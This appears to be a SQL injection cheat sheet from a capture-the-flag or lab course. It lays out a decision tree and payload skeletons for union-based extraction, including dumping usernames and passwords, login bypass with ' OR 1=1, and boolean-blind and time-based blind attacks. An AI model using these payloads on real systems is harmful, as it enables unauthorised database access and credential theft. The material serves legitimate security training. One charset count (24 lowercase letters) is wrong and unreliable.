SQLi quick reference — appendix

Class
SQL Injection
On this page

SQLi quick reference

The four SQLi techniques in one page. Use this when you are staring at a /run endpoint and not sure which oracle to reach for.

Decision tree

1. Inject — does the server react differently than baseline?
   └─ no  → not injectable (or you are missing the right field)
   └─ yes ↓

2. Does the response body include extracted data?
   └─ yes → union-based. find column count, then dump.
   └─ no  ↓

3. Is there a yes/no signal anywhere (status, body field, header)?
   └─ yes → boolean blind. walk with LIKE 'prefix%'.
   └─ no  ↓

4. Use timing. Server-leaked `time` field → easy.
   Network-only → 5s sleep + 2x baseline threshold.

Union-based skeleton

-- 1. column count
?  UNION SELECT 1       -- 1222 = wrong count
?  UNION SELECT 1,2     -- still wrong
?  UNION SELECT 1,2,3   -- 3 = N (the answer)

-- 2. visible column
?  UNION SELECT 1,2,3                       -- the column that shows on the page is your target

-- 3. extract
?  UNION SELECT 1, database(), 3
?  UNION SELECT 1, group_concat(table_name), 3
       FROM information_schema.tables
       WHERE table_schema = '<db>'
?  UNION SELECT 1, group_concat(column_name), 3
       FROM information_schema.columns
       WHERE table_name = '<table>'
?  UNION SELECT 1, group_concat(username,':',password SEPARATOR '<br>'), 3
       FROM <table>

Auth bypass skeleton

username: ' OR 1=1;--
password: anything

Becomes:

SELECT * FROM users
WHERE  username='' OR 1=1;--' AND password='anything' LIMIT 1;

Variants (all work on MySQL):

  • ' OR '1'='1' --
  • admin' --
  • ' OR 1=1#

Boolean blind skeleton

-- oracle payload
<fake> ' UNION SELECT 1,2,3 WHERE <condition> LIKE '<prefix>%';--

Walk:

condition LIKE 'a%'  →  false
condition LIKE 's%'  →  true   ← first letter
condition LIKE 'sq%' →  true   ← second letter
...
condition LIKE 'sqli_three' → true   ← exact match (no wildcard) = done

Common <condition> targets:

  • database()
  • (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)
  • (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1)
  • (SELECT password FROM users WHERE username='admin')

Time-based blind skeleton

-- server-leaked timing is easiest:
<fake> ' UNION SELECT SLEEP(2),2 WHERE <condition> LIKE '<prefix>%';--

Network-only timing needs IF:

<fake> ' UNION SELECT IF(<condition>, SLEEP(5), 0),2;--

Charset sizing

  • 4-digit numeric password → 40 requests worst case (10 × 4)
  • 8-char lowercase → 192 requests (24 × 8)
  • 8-char mixed (95 chars) → 760 requests — switch to binary search on ASCII → 8 × 7 = 56 requests

What to log in your notes

For each level you solve, record:

  • endpoint and parameters (URL-decoded)
  • column count + which column is visible
  • database / table / column chain
  • the exact LIKE or UNION payload that worked
  • response timing baseline (ms)
  • the flag